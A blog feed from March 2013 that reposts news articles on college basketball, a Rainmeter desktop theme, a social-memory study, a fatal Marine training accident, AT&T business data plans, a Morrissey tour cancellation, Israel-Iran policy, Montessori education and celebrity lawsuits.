Sunday, March 31, 2013

UCLA hires Alford away from New Mexico

UCLA hires Alford: Steve Alford succeeds UCLA basketball coach Ben Howland, who was fired last weekend after 10 years. Alford had just inked a 10-year deal with New Mexico, when UCLA snagged him.

By Beth Harris,?Associated Press / March 30, 2013

Former New Mexico head coach Steve Alford reacts to a referee's call during a game against Harvard in the NCAA college basketball tournament in Salt Lake City earlier this month. Alford was hired Saturday to coach UCLA.

(AP Photo/Rick Bowmer)

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UCLA hired Steve Alford as basketball coach on Saturday, luring him from New Mexico days after he signed a new 10-year deal with the Lobos.

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Athletic director Dan Guerrero said Alford is "the perfect fit for UCLA" because he connects with a new generation of players and brings an up-tempo and team-oriented style of play to Westwood.

The 48-year-old coach succeeds Ben Howland, who was fired last weekend after 10 years and a 233-107 record that included three consecutive Final Four appearances and four Pac-12 titles. The Bruins were 25-10 this season, which ended with a 20-point loss to Minnesota in the second round of the NCAA tournament.

Alford led New Mexico to a 29-6 record this season that included the Mountain West regular-season and tournament titles. But the Lobos were upset by Harvard in the second round of the NCAAs shortly after Alford's new deal with the school had been announced.

Alford will be introduced at UCLA on Tuesday.

"I have been so fortunate and blessed in my life, and an opportunity to lead one of the greatest programs in college basketball history is once-in-a-lifetime," he said in a statement.

Alford had a 155-52 record in six years at New Mexico, with the Lobos making three trips to the NCAA tournament. He was selected Mountain West coach of the year three times.

His other head coaching stints were at Iowa (2000-07), Missouri State (1996-99) and Manchester College (1992-95) in his native Indiana.

Alford is a legend in the Hoosier state, where he starred at Indiana University from 1984-87 under coach Bob Knight. The Hoosiers won the national championship in his senior year. He also played on the gold medal-winning 1984 U.S. Olympic basketball team in Los Angeles as a college sophomore. Knight coached that team.

Alford was drafted by the Dallas Mavericks in 1987 and played four years in the NBA before starting his head coaching career at tiny Manchester.

Copyright 2013 The Associated Press.

Source: http://rss.csmonitor.com/~r/feeds/csm/~3/4xg0Lekkyj0/UCLA-hires-Alford-away-from-New-Mexico

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Friday, March 29, 2013

The Transistor Desktop

The Transistor Desktop Reader Raghken was so enamored with the teaser trailer for Supergiant Games' upcoming title, Transistor (you can read all about it over at Kotaku) that he built this week's featured desktop around it. Even if you're unfamiliar with the game, the wallpaper is gorgeous.

If you are familiar with the game (or familiar with Supergiant Games' previous hit game, Bastion, you'll want to keep an eye out for Transistor. It looks great. If you're not into video games, just appreciate the stylized cityscape wallpaper, and the way Raghken incorporated Rainmeter into it like it belongs there.

Here's how he did it, and what you'll need to make it your own:

  • The wallpaper, an HD screencap from the Transistor teaser trailer
  • The Julius Sans One font for the Rainmeter widgets and system text (the same font used in the trailer)
  • Rainmeter, a system tweaking and monitoring tool for Windows
  • The Simple Media theme for Rainmeter for the time and date display
  • The Elementary theme for Rainmeter for the weather
  • The Rainbow theme for the app launcher in the upper left
  • The Muziko theme for Rainmeter for the "Now Playing" display

With those themes and the right font, you should have no trouble making this desktop your own, or just tweaking it so it fits better with your workflow. If you do run into issues though, stop by the original thread in our #featured-desktop forum to ask your questions, or check out our guide to Rainmeter for tips.

Do you have a good-looking, functional desktop that you want to see featured here? Submit it?along with where you got the wallpaper, skins, and geeklets?to us for review. We have two different ways you can share it with us:

Linux, Mac, Windows, all are welcome. Whatever you choose to use, include a description of how you made your desktop when you send it in. Without that, we can't tell others how to make it for themselves so they can be featured too!

Original Post via #featured-desktop

Source: http://feeds.gawker.com/~r/lifehacker/full/~3/Kj5EY66obkQ/the-transistor-desktop

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Friday, March 22, 2013

Do i know you? Memory patterns help us recall the social webs we weave

Mar. 21, 2013 ? With a dizzying number of ties in our social networks -- that your Aunt Alice is a neighbor of Muhammad who is married to Natasha who is your wife's boss -- it's a wonder we remember any of it. How do we keep track of the complexity? We cheat, says a Cornell University sociologist in Scientific Reports (March 21), a publication of Nature.

Humans keep track of social information not by rote memorization but with simplifying rules, as you might remember a number sequence that always increases by two, according to author Matthew Brashears, assistant professor of sociology. People recall social ties that both involve at least three people who know each other and kinship labels such as "aunt" twice as well as they remember ties that do not, even though triad kinship networks are far more complex, he said.

"Humans are able to manage big, sprawling, complicated social networks essentially because we don't remember big, sprawling, complicated social networks. We remember simplified, regular structures that bear a reasonable similarity to what those networks look like," Brashears said. In cases where the relationships don't fit the pattern, we remember the pattern and the few exceptions, instead of remembering all the ties simultaneously, he added.

About 300 study participants read paragraphs describing a group of people and how they relate to each other. Some paragraphs included kinship labels and some didn't. Other paragraphs included closed triads -- where three people each know each other -- while other paragraphs did not. The participants were then asked to recall as many of the ties as possible.

When the paragraphs contained both kinship labels and closed triads, the participants' recall improved by 50 percent compared with participants whose paragraphs included neither -- even though the kinship and triad paragraphs contained nearly twice as many relationships.

"That's a pretty substantial improvement," Brashears said. Moreover, participants did worse when trying to recall paragraphs that had kin relationships but no triads. "It's like trying to remember a random number sequence by using the 'increase by two' rule," he said.

The study helps explain how humans actively manage so many more social ties compared with other primates -- a key question in the field of sociology. The answer is that we evolved the capacity to spot and use social patterns.

"Our ability to remember and manage socials ties -- and build bigger groups of people -- had to do with coming up with new and interesting ways of compressing that information. It's about how we structure our groups and how that allows us to remember them, as opposed to just sheer cognitive horsepower," he said.

The research may help also explain some peculiarities of human networks, such as transitivity: If George is my friend and Susan is my friend, then Susan and George are likely to be friends. Brashears suspects that some social networks are easier to remember than others, and individuals who build groups that conform to those rules were more evolutionarily successful.

"Some of the reasons why human networks look the way they do is because they have to, in order for us to process them, to manage it cognitively," he says.

Medical researchers may benefit from the research as they seek to understand why some people don't grasp social intricacies as well as others. "We may have a better ability to understand social anxiety and autism spectrum if we understand how we're compressing and reconstructing social information using these mechanisms," Brashears said.

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Story Source:

The above story is reprinted from materials provided by Cornell University, via Newswise.

Note: Materials may be edited for content and length. For further information, please contact the source cited above.


Journal Reference:

  1. Matthew E. Brashears. Humans use Compression Heuristics to Improve the Recall of Social Networks. Scientific Reports, 2013; 3 DOI: 10.1038/srep01513

Note: If no author is given, the source is cited instead.

Disclaimer: This article is not intended to provide medical advice, diagnosis or treatment. Views expressed here do not necessarily reflect those of ScienceDaily or its staff.

Source: http://feeds.sciencedaily.com/~r/sciencedaily/top_news/top_health/~3/Fj22CsKJSTU/130321131944.htm

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3 Tips for Improving Employee Engagement and Productivity ? Time ...

We?re so pleased to feature a guest post today from Persis Swift, Marketing Communications Specialist at CAI. She?s got some great insights on how to motivate your employees! And now, without further ado, take it away, Persis?

group of happy workers

All employers have a desire to direct a business that runs efficiently and produces stellar results. One way to fulfill this goal is to ensure your employees are engaged and satisfied with their roles at the company. Many positive results arise when employees are content with their position and duties for their job. Some results include increased employee morale, decreased turnover and better productivity. Several strategies can help you create a work environment that encourages employees to be motivated and work harder.

Here are three actions that you can implement at your organization to improve engagement and productivity:

Opportunities

Employees work harder when they have an attainable goal to work towards. Opportunities for a promotion, raise or special assignment are likely to keep your staffers engaged. Share with them the different opportunities available, and assist them in creating a path to secure the results they want, which will help you secure the results you want.

Transparency

Transparency is an essential element for companies wanting to be successful. There are a number of ways you can promote transparency at your organization. Instruct your managers to communicate frequently with their direct reports about their progress and opportunities for growth. Make sure everyone receives positive and constructive feedback. In addition, don?t shy away from answering questions about company finances, improving benefits and other topics that are top of mind to your employees.

Reward

Having a successful business is dependent on many factors, including how satisfied the employees who work for you are. An easy way to turn unhappy workers into more content ones is to recognize the contributions they?ve made for your organization?s benefit. You can reward your employees in a number of ways. Some options include free lunch, a raise, an office, extra time off ? just be sure they are rewards your team members will enjoy and appreciate.

For additional tips to keep your workforce engaged, please call a member of CAI?s Advice and Counsel Team at 919-878-9222 or 336-668-7746.

About the Author

Persis Swift is the director and main author of Workplace Insights, a blog by CAI that posts HR-related articles every Tuesday and Thursday morning. CAI is a trusted resource for HR, compliance and people development with offices in Raleigh and Greensboro.

Source: http://www.timeforbusinessblog.com/2013/engagment-and-productivity.php

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Media coverage of poverty: Why so little?

Front page from part three of the eight-day Children in Poverty series from the Springfield News-Leader in Missouri.

By Barbara Raab, Senior Producer, NBC News

"Why is there so little coverage of Americans who are struggling with poverty?"

So begins a thought-provoking essay by Dan Froomkin in Nieman Reports, a respected publication that covers journalism, raising a subject that is getting more ink than usual these days.

In his essay, Froomkin examines what he sees as paltry coverage of America's poor. Citing research from the?Pew Research Center's Project for Excellence in Journalism, Froomkin reports that poverty coverage takes up less than one percent of the news content in the nation's major news outlets. ?

He and others suggest some possible reasons ("neither advertisers nor readers are likely to demand more coverage, so neither will editors," for one) along with a wealth of ideas that could make compelling stories for readers and viewers.

Froomkin's piece begins with an example of what he'd like to see more of: a major series that ran on the front page of the Springfield News-Leader in Missouri's Ozarks for five consecutive days, focusing each day on a specific problem facing children in Missouri's Ozarks region: "No home," "No shoes," "No food," "No car," and "No peace." It's outstanding work, well worth a read.


Froomkin's article led the public editor (a/k/a ombudsman) of The New York Times?to raise questions about her own newspaper's coverage of poverty, and to let readers know she'd be digging further into that question in coming weeks. Among her initial observations: The Times?reporter who has covered poverty policy for decades thinks the paper "has made an extraordinary commitment" to the subject, but some advocates for the poor beg to differ. We'll be watching for more of this discussion in the weeks ahead.

This past Sunday, some of us woke up to?a?lively viewer call-in segment?on C-Span?s Washington Journal?about hunger in America, and about media coverage of it. A lot of callers had strong feelings about the issue, and about what should be done to attack the poverty problems in the country (as did almost all of the hundreds of commenters on our first blog post for the In Plain Sight project here).

Here is more of what the In Plain Sight team has been watching and reading this week:

  • The Philadelphia Inquirer reports?Philly has the highest rate of deep poverty?? that?s income below half the poverty line ??of big cities in America. That's?perhaps not a surprise, because Philadelphia also has the highest poverty rate ? 28.4 percent ? of any of America?s biggest cities.
  • The Washington Post had?a terrific read?on a Rhode Island town that relies on food stamps to survive. Be sure to check out the accompanying?SNAP Map?breaking down food stamp distribution by state.
  • Is hunger in America a ?myth?? A former Montana state legislator?makes the argument?in an op-ed in the Great Falls Tribune.
  • And here?s?one economist?s argument?against raising the minimum wage.

What are you reading and watching on poverty in America? And what are your thoughts about media coverage of poverty??

Source: http://inplainsight.nbcnews.com/_news/2013/03/20/17385837-media-coverage-of-poverty-is-there-enough?lite

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Thursday, March 21, 2013

Marines killed in training were young, with bright futures

CAMP LEJEUNE, N.C. (AP) ? They're called "leathernecks" or "Devil Dogs," but some of the Marines killed in a desert training accident this week were just a year or so out of high school, their boyish faces not yet weathered by life's hardships

Just 19, Pfc. Josh Martino of Dubois, Pa., had already spent nearly half his young life dreaming of becoming one of "the few, the proud." He had joined in July and was hoping to marry his fiancee later this year before being deployed to Afghanistan, his mother said.

"Since he was probably 8 years old he wanted to be a Marine," Karen Perry said Wednesday after meeting with military officials to start planning her son's funeral. "That's all he wanted to do."

Lance Cpl. Josh Taylor, 21, also seemed to have been born for the Corps. The Marietta, Ohio, native had talked about being a Marine since he was about 5, said his grandfather, Larry Stephens. Josh, too, was planning for a wedding, scheduled for May.

Both young men were among seven members of the 2nd Marine Expeditionary Force killed late Monday when a mortar shell exploded in its firing tube during an exercise at Hawthorne Army Depot in Nevada. Eight men were injured, some severely.

A decade after the invasion of Iraq and nearly 12 years since the United States launched the global war on terror, Americans have become wearily accustomed to the sight of flag-draped coffins being solemnly offloaded at Dover Air Force Base. But news of such loss on American soil, far from any foreign battlefield, has the power to shock.

___

During the past dozen years, barber Kenton Jones has touched the heads of many Marines and their family members. And they have touched him. Some of the men who've sat in his chair at Sharpe Cuts II ? just up a busy highway from Lejeune's main gate ? came home from the Middle East in coffins.

Staring out his window, he couldn't help wondering whether any of those killed or wounded in Nevada had come under his shears.

"During a time of war or whatever, the occupation ... you kind of expect it," he says. "But when it happens here, it seems senseless and it seems like a loss that could have been prevented."

Down the road in Jacksonville, Marine veteran Guy Henry Woods led out-of-state relatives on a tour of the Beirut Memorial, built to honor the 241 Marines, sailors and other American service members who died in a 1983 truck bombing that destroyed their barracks in the Lebanese capital.

Woods, 66, was wounded twice in Vietnam and spent time in a U.S. Navy hospital in Guam. Surrounded by curved glass walls etched with the names of the fallen, Woods said it mattered not whether these Marines died in an accident here at home or on a distant battlefield.

"They put that uniform on, they gain the same respect as anybody that's been to war," the grizzled 20-year veteran said over the sound of the dancing water in the memorial's fountain. "That's the way I personally look at it myself. I still respect them, and I sympathize with them for what happened."

___

The seven Marines killed ranged in age from 19 to 26 22. Some had served overseas; others were training for their first deployment.

While many had long dreamed of being Marines, some were already making plans for a life after the Corps.

Twenty-six-year-old Aaron Ripperda of Highland, Ill., joined the service after graduating from a St. Louis culinary school and finding the job market flat. His father tried to gently dissuade him.

"He told us he always felt like he had a calling to join the Marines," Kent Ripperda told The Associated Press from his home in Marine, Ill. "I guess maybe it was a prestige thing."

During a 2010 deployment in Afghanistan, Ripperda's mobile unit was responsible for transporting food to bases in the region, Justin Bergstrom, a fellow Marine, told the St. Louis Post-Dispatch in an email.

"He did talk about his cooking abilities," Bergstrom wrote. They joked about him being able to keep his fellow Marines fed.

Kent Ripperda said his son was eager to go back to college and "get on with his life."

Roger Muchnick, 23, who grew up in Westport, Conn., had already pulled one tour in Afghanistan and was thinking about returning to college after his enlistment was up, said his grandfather, Jerome Muchnick.

Muchnick played on the football and lacrosse teams at Staples High School and went on to play lacrosse at Eastern Connecticut State University, where he studied business. In a biography on the university's website, Muchnick said the one thing he would like to do before he died was "live," and that his most embarrassing moment was getting caught lip-synching in a school talent show.

"He was a fabulous kid. Just fabulous," his grandfather said. "He was at the top of his game when this happened. ... You can't imagine losing a very handsome, 23-year-old grandson who was vital and loving."

Lance Cpl. William Taylor Wild IV, 21, joined the Marines shortly after graduating in 2010 form Severna Park High School near Annapolis, Md. His mother, Elizabeth Wild, said he was in a weapons platoon that was scheduled to deploy to Afghanistan in November. He already had been deployed twice to Afghanistan and once to Kuwait.

Wild said her son always wanted to go into the military, like his father, who is a command chief in the Air Force Reserve at Dover Air Force Base in Delaware.

The military Wednesday night identified the other Marines who were killed as Lance Cpl. David P. Fenn II, 20, of Polk City, Fla., and Lance Cpl. Mason J. Vanderwork, 21, of Hickory, N.C.

Both joined the Marines in June 2010 and were deployed to Afghanistan in 2011, a spokesman for the 2nd Marine Expeditionary Force said in a written statement.

___

The explosion Monday caused an immediate suspension of the use of 60 mm mortars by the Marine Corps, with an exemption for troops in Afghanistan, U.S. military and Marine officials said. Marine units on the warfront may continue to use the mortars with the review and approval of their commanders. U.S. military officials in Afghanistan said they have not stopped using the mortars there.

The suspension, which will be in effect until the accident investigation is complete, largely affects units that are training, although those Marines could use the larger and more powerful 81 mm mortar systems if needed.

At Camp Lejeune, an 170-square-mile base and home to about 50,000 uniformed troops, counselors at the Naval Hospital were gearing up to offer help as the ripples from Monday's tragedy began reaching family and friends, barracks mates and survivors, said Dr. Sawsan Ghurani, director of mental health programs at the hospital.

"It's so unexpected that it's more of a shock than if you'd been mentally prepared" for battlefield casualties, said Ghurani, a psychiatrist and Navy captain. "You hope people don't die in war, but it is a common occurrence and whereas, in training exercises, it's very rare."

The ages of the victims make it even worse, Ghurani said.

"For me, it's especially tragic when they are so young and still have so much left to give in life and to experience in life that it just seems unfair," she said. But, she added, "The nature of the military culture is to be selfless."

___

Contributing to this report were Associated Press writers Ted Bridis, Lolita Baldor and Pauline Jelinek in Washington, Scott Sonner and Martin Griffith in Reno, Nev., Michelle Rindels and Ken Ritter in Las Vegas, Mitch Stacy in Columbus, Ohio, Jim Suhr from St. Louis, and Dave Collins in Hartford, Conn.

Source: http://news.yahoo.com/marines-killed-training-were-young-lives-ahead-213439586.html

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Wednesday, March 20, 2013

AT&T to offer larger data plans for businesses

AT&T to offer larger data plans for businesses

AT&T is rolling out new, large data plans aimed at businesses. The new plans start at $300 per month for 30GB of data, with 40GB going for $400 per month, and 50GB for $500. Devices like feature phones, laptops, and tablets can all be added to these plans as well. These new plans, under the Mobile Share umbrella, also come with unlimited talk and text, as well as tethering for smartphones. AT&T says:

The new plans are ideal for businesses, as well as consumers who need more data, and build on AT&T?s existing Mobile Share plans with expanded options of 30 GB, 40 GB and 50 GB, including unlimited calls and texts. In addition, AT&T is offering new Mobile Share ? Data plans for businesses and consumers and new Business Pooled Nation for Data plans for business customers.

Each plan is also limited by the number of devices it can add to these plans. For the 30GB plan, a business can add 15 devices, while 40GB and 50GB can ad 20 and 25 devices, respectively. Businesses that need to add more devices can use the AT&T Business Pooled Nation for Data plans, which have options ranging from 300MB to 10GB per month. Finally, AT&T is adding data-only plans for consumers and businesses, starting at $30 per month for 4GB, going to $335 for 50GB. Each of these plans will be available beginning this Friday, March 22.

Source: AT&T



Source: http://feedproxy.google.com/~r/TheIphoneBlog/~3/A06AF5JTZsY/story01.htm

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Monday, March 18, 2013

Morrissey cancels remaining tour dates

By Miriam Coleman, Rolling Stone

Morrissey has cancelled all of the remaining dates on his North American tour as the result of a variety of medical ailments.

Kevin Winter / Getty Images file

Over the last year, the 53-year-old singer has cancelled 21 shows after suffering from a bleeding ulcer and Barrett's esophagus. On Tuesday, he was hospitalized in San Francisco for double pneumonia.

Jimmy Kimmel: Morrissey 'Keeps finding new ways to depress us'

"Despite his best efforts to try to continue touring, Morrissey has to take a hiatus and will not be able to continue on the rest of the tour," the singer's representative said in a statement. "Morrissey thanks all of his fans for their well wishes and thoughts."

Morrissey is canceling a total of 22 remaining dates, beginning with Monday's show in Lawrence, Kan. Refunds for the tickets will be available at the point of purchase.?

More from Rolling Stone:?

Source: http://entertainment.nbcnews.com/_news/2013/03/16/17339516-morrissey-cancels-remaining-tour-dates?lite

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On the Brink: Israel to grill Obama over Iran

Iran presidency via EPA, file

Iranian President Mahmoud Ahmadinejad (center) inspects the Natanz nuclear plant in central Iran in March 2007. The U.S. and Israel fear Iran wants to build a nuclear bomb, a claim Tehran denies.

The leaders of the United States and Israel are about to have some serious face time -- five-and-a-half hours culminating in a late-night dinner on Wednesday. Three key issues will dominate the agenda: Iran, Syria and the Palestinians. In the first part of our "On the Brink" series,?NBC News correspondent Martin Fletcher --?who has been covering the region for three decades?--?gives his take?on a problem of global significance: the prospect of Iran getting nuclear weapons and military action to stop that happening.

News analysis

Israel?s Prime Minister Benjamin Netanyahu will have one key question for President Barack Obama when they meet Wednesday: If push comes to shove, will America attack Iran to stop the Iranians from developing a nuclear bomb?

Obama has a question of his own, just as critical. Will Israel promise not to attack Iran without American approval?

Ahead of the U.S. president's trip, Israel?s President Shimon Peres described Iran as ?the greatest threat to peace in the world.?

Lucas Jackson / Reuters, file

Israel's Prime Minister Benjamin Netanyahu points to a red line he has drawn on a graphic of a bomb used to represent Iran's nuclear program as he addresses the United Nations General Assembly in September last year.

He made the remark in a March 12 speech to the European Parliament in Strasburg, but he likely had Washington in mind.

On paper there is little light between the U.S. and Israeli positions. Obama and Netanyahu both say they will not permit Iran to obtain nuclear weapons. They both hope sanctions and political pressure will do the job. Both say all options are open, including military.

So how come neither trusts the other?

Israeli analysts point to North Korea, which has also been subject to international sanctions and American warnings against pursuing a nuclear weapons program.

Yet today, North Korea not only has a nuclear weapon but has threatened to use it to attack America.

So the Israeli analysts ask, what good are American promises on Iran?

On the other hand, can Israel really go it alone?

The reality is that Israel?s so-called red line -- the point at which it must attack for the strike to be effective -- is much closer than America?s because the U.S. has many more, and more powerful, bunker-busting bombs that can hit Iranian nuclear installations like Fordow.

The shared U.S./Israeli assessment appears to be that the Iranians will have enough weapons-grade uranium for an atom bomb by mid-2013. So what to do?

Most analysts in Israel agree on two things. First, Israel must act. No country can ignore threats to obliterate it, especially a country born from the Holocaust. Second, Israel cannot destroy Iran?s nuclear program alone. At best, it can delay it. Yet that is what Israel?s policy has been for a decade.

Israel is already fighting a secret war against Iran, reportedly assassinating Iranian nuclear scientists, planting computer viruses in the heart of Iranian scientific complexes, destroying centrifuges by taking over their operating programs and making them spin themselves to destruction, and booby-trapping key items that Iran imports from foreign countries.

Israeli Prime Minister Benjamin Netanyahu voices concern over the progress of Iran's nuclear program while addressing the American Israel Public Affairs Committee.

So why up the stakes by launching an air attack, with all the risks of downed pilots being captured, civilian casualties, and massive reprisals?

This would at best buy a few years' time, while giving Iran the excuse it needs -- in the light of open Israeli aggression -- to publicly declare its need for a defensive nuclear option.

Israel?s considerations go beyond an actual attack. The question is, will Iran?s response be so severe that Israel would regret attacking it for evermore? That?s certainly what Iran wants Israel to think.

But Iran?s threats to rain down thousands of rockets a day on Israel appear increasingly hollow.

Syrian support for Iran is now far from guaranteed. And economic sanctions mean Iran is less able to finance and supply its allies in the war against Israel -- Hezbollah in south Lebanon and Hamas in Gaza.

Israeli military analysts are increasingly sanguine about the threat. They believe Iran?s response will be severe, but nothing like it would have been before the revolt against President Bashar Assad in Syria, which weakened him and Hezbollah.

As for Washington, there is certainly no stomach for another war just as it is winding down troop levels in Afghanistan.

It?s the last thing America needs as it tries to cut down on spending and reduce its $16 trillion national debt.

Yet Obama appears committed to doing whatever it takes to stop the Iranians from getting a nuke.

Foreign Policy magazine reported last October that America and Israel were considering a joint air attack that could last days, or maybe just hours. But then what?

The best hope for a peaceful solution would be regime change in Iran, or a change of heart by the present fundamentalist Muslim leaders.

Neither seems likely.

On Monday, Martin Fletcher looks at what is possibly an even more urgent threat to Israel: the civil war in Syria.

Martin Fletcher is the author of ?Walking Israel," "The List" and "Breaking News."

President Obama makes his first trip to Israel where he will meet with Israeli President Shimon Peres and Prime Minister Benjamin Netanyahu as well as Palestinian Authority President Mahmoud Abbas. NBC's Peter Alexander reports.

Related:

Obama: Iran more than a year away from nuclear weapon

Netanyahu says nuclear talks buy Iran time to build the bomb

Analysis: Israel airstrike may foreshadow Iran attack

This story was originally published on

Source: http://worldnews.nbcnews.com/_news/2013/03/17/17306968-on-the-brink-israel-to-grill-obama-over-possible-military-strike-on-iran?lite

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Sunday, March 17, 2013

Wisconsin beats Michigan 68-59 in B10 tournament

Wisconsin head coach Bo Ryan watches as his bench reacts during the second half of an NCAA college basketball game at the Big Ten tournament against MichiganFriday, March 15, 2013, in Chicago. (AP Photo/Nam Y. Huh)

Wisconsin head coach Bo Ryan watches as his bench reacts during the second half of an NCAA college basketball game at the Big Ten tournament against MichiganFriday, March 15, 2013, in Chicago. (AP Photo/Nam Y. Huh)

Wisconsin's Jared Berggren shoots over Michigan's Jon Horford during the first half of an NCAA college basketball game at the Big Ten tournament Friday, March 15, 2013, in Chicago. (AP Photo/Nam Y. Huh)

Wisconsin's Mike Bruesewitz and Michigan's Mitch McGary (4) battle for a rebound during the first half of an NCAA college basketball game at the Big Ten tournament Friday, March 15, 2013, in Chicago. (AP Photo/Charles Rex Arbogast)

Michigan's Matt Vogrich grabs a rebound in front of Wisconsin's Ryan Evans (5) during the first half of an NCAA college basketball game at the Big Ten tournament Friday, March 15, 2013, in Chicago. (AP Photo/Nam Y. Huh)

Michigan's Max Bielfeldt (44) goes after a loose ball with Wisconsin's Jared Berggren (40) and Sam Dekker (15) during the first half of an NCAA college basketball game at the Big Ten tournament Friday, March 15, 2013, in Chicago. (AP Photo/Nam Y. Huh)

(AP) ? Wisconsin just kept missing. The Badgers were icy cold from long range, simple layups a risky proposition. And they only trailed by three at the break.

When Ben Brust and Co. finally found their stroke, it was all over for Michigan.

Brust scored 11 of his 14 points in the second half and No. 22 Wisconsin knocked off the sixth-ranked Wolverines 68-59 in the second round of the Big Ten tournament on Friday.

"Just a great team effort," coach Bo Ryan said. "Guys picked each other up. They didn't get frustrated when the shots weren't going down in the first half. We took care of that in the second half, and continued to hustle on defense."

Traevon Jackson had 16 points for the Badgers (22-10), who will play top-seeded Indiana in the semifinals on Saturday. Ryan Evans added 12 points, six rebounds and six assists.

"It's the old cliche, defense wins championships," Evans said. "We understand that here. Anything we can do to slow those guys down and get our shots will move us forward."

Trey Burke had 19 points and seven assists for Michigan (26-7), but the Big Ten player of the year was 8 for 22 from the field. Tim Hardaway Jr. shook off an ankle injury in the first half and finished with 14 points and nine boards.

"We had some chances to take the game back over and get back in front and we just couldn't do it," coach John Beilein said. "A lot of that has to do with how we develop as a team and a lot has to do with how talented a team Wisconsin really is."

The Wolverines advanced with an 83-66 victory over Penn State on Thursday, setting up a sequel to one of the best games of the season. Wisconsin rallied for a 65-62 victory over Michigan on Feb. 9 when Brust hit a tying 3-pointer from just inside midcourt at the end of regulation, then hit another big 3 with 39 seconds left in overtime.

This one was lacking that sort of drama, but still had a compelling finish.

Wisconsin warmed up in the second half, putting together a 10-0 run to take a 29-24 lead with 15:09 to go. Brust hit a 3-pointer, Jared Berggren converted two layups and Frank Kaminsky capped the run with another 3.

Michigan tried to rally, but Wisconsin had an answer each time. And the Badgers had a couple of different players step up at crucial points.

Mike Bruesewitz and Brust each hit a big 3-pointer. Evans wriggled free for a layup and a jumper to extend the lead to 49-42 with 7:56 left. Brust tacked on another 3 from the corner to extend Wisconsin's lead to 11, forcing a Michigan timeout with 6:01 remaining.

"We wanted to go inside out, and that's how we started the half," Evans said. "I started with a bucket, and they had to collapse. Then our 3-pointers, Mike and Ben ? it was good to see Mike get going today."

The Wolverines put together a 9-0 run to get within 56-54, but Kaminsky made a pull-up jumper as the final seconds of the shot clock ticked off. Burke then missed inside, Jackson went 1 for 2 at the line to make it a five-point game, and the Badgers closed it out from there.

Bruesewitz, Berggren and Kaminsky had eight points apiece for the Badgers, who made 16 of 21 foul shots.

Michigan got a scare midway through the first half when Hardaway twisted his left ankle when he got his foot caught under Bruesewitz after he attempted a floater in the lane. He had to be helped to the locker room, but he returned a couple minutes later, earning a round of applause from the sellout crowd.

"It was hurting for a little bit when I came back out, but it loosened up while I was playing on it and it got better while the game was going on," he said.

The contrasting styles of the high-scoring Wolverines and defensive-minded Badgers were on full display during an ugly first half that featured almost as many turnovers (14) as field goals (15).

Burke helped send a charge through the crowd with a long alley-oop to a streaking Hardaway, who soared in for the dunk with 11:49 to go. Hardaway saluted the crowd as he bounded down the court after the big jam.

But Berggren immediately dunked on the other end for Wisconsin, and the Badgers used their stifling defense to stick around despite an awful shooting display. Jackson hit a 3-pointer with 4 seconds left to trim Michigan's lead to 20-17 at the break.

The halftime statistics were alarming for both sides. The Badgers were 5 for 29 from the field, but the Wolverines were only slightly better at 10 for 29. Michigan missed all five of its foul shots and committed eight turnovers in the first 20 minutes.

The Badgers bounced back, shooting 60.7 percent in the second half, compared to 46.4 percent for the Wolverines.

"I think we've got a really talented group of guys, and when we come together, we can beat anybody," Jackson said.

___

Jay Cohen can be reached at http://www.twitter.com/jcohenap

Associated Press

Source: http://hosted2.ap.org/APDEFAULT/347875155d53465d95cec892aeb06419/Article_2013-03-15-BKC-T25-B10-Michigan-Wisconsin/id-27ddb40035f342c893da7eae01ce0404

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Rob Portman fallout: How far is GOP from embracing gay rights? (+video) (Christian Science Monitor)

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What Is Montessori? An Approach To Education For A Changing World

In the traditional sense, the concept of school brings to mind images of four-walled classrooms, with the teacher in front and the children lined up or firmly seated in straight rows. All work is centred on books and paperwork, and playtimes are allowed within a specific time frame only. This teaching setup often puts an emphasis on unquestionable authority, obedience, discipline and conformity.

The Montessori method of teaching, on the other hand, looks unstructured and freewheeling to the untrained eye. If you're a parent looking for the right school environment for your children and want to find an answer to the question "What is Montessori," you can start by observing a Montessori class. The teacher isn't the centre of attention inside a classroom. Students may be busy with activities different from the activities of their classmates; some are working as a group, others are doing things individually. A lot of them are working with their hands with various toys, materials and learning tools.

While you may get the impression that everything is just free play, the fact is everything that happens inside a Montessori classroom is based on a specific design and a careful and scientific structure. The principles of this approach to education were designed by experts who for years closely studied the ways and processes of how children learn, develop and improve as individuals. These experts discovered and proved that children learn by doing. They achieve development through the joy of discovery. They improve as individuals because of the confidence and love of learning that they have acquired, and not because of adult intrusion and doing what they are told to do.

Montessori schooling is inspired by the concept of the "absorbent mind," the term experts used to describe the intense mental activity and the incredible capacity for learning that children exhibit from birth to six years old. During these early years, children will absorb everything there is to learn about their immediate environment - it is an easy, natural and inevitable process; it is their way of survival. This environment can be carefully prepared and designed in order to further encourage children to design their own learning. Preparation of the environment includes the use of manipulative materials and the encouragement of hands-on activities, social interaction and activities that lead to insights and lessons. This environment - an environment enriched with discovery, learning and intelligent observations- is what the Montessori classroom seeks to offer.

For someone new to the concept, it is just natural for many questions to crop up as you get to learn more about the Montessori approach to education. A Montessori teacher will be happy to discuss important points with you. So go ahead and ask your questions. In a changing world, a person who wonders is a person who discovers.

Together with the changing environment is the change in learning processes. Many learning experts these days like Dr. Maria Montessori are looking for brand new and more effective approach to learning. To learn more, visit this website http://www.themontessoriplace.org.uk/montessori/what-is-montessori/

Source: http://articles.submityourarticle.com/what-is-montessori-an-approach-to-education-for-a-changing-world-321071

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Thursday, March 14, 2013

LEGAL WARS - The Young, Black, and Fabulous

 photo NeYoBRITAwardsheldo2ArenaGreenwichNKB1_Sr8V2dl_zpse1d03953.jpg

Ne-Yo may be busy on his 6-date UK tour at the moment, but his legal woes are also getting shine back in the states. Check out why his ex-girlfriend Jesseca is officially suing him, plus how Deion just won official primary custody of his kids....

Remember when Ne-Yo's ex-girlfriend...who once lied to him about being the father of her child...threatened to sue him for defamation this past December?? Well, she's gone and officially done it.

Jesseca White filed a lawsuit claiming that Ne-Yo's statement on his VH1 "Behind The Music" was defamatory to her.? She says he called her "an unchaste woman who deliberately tricked him into believing he was the father of her child ... so that she could fraudulently bilk him of 'ungodly amounts of money.'"

Well, she did put his name down as the daddy on the birth certificate of her daughter back in 2005, when she and Ne-Yo were dating.? And the paternity test did prove he was NOT?the father.

Jesseca claims she's lost out on business as a graphic designer and photographer because of his statements.? And she's been called all kinds of b*tches and sluts after his episode aired.?

TMZ reports she's suing for unspecified damages.

?

 photo paEDIT_zpsb9c79ced.jpg

In other legal news, Deion Sanders has won primary custody of all three of his and Pilar's kids.??

Back in December, his estranged wife Pilar lost temporary custody of their two sons (ages 11 and 13).? Now, the court has awarded Deion official primary custody of the kids.? As for their 9-year-old daughter, he and Pilar will share custody.

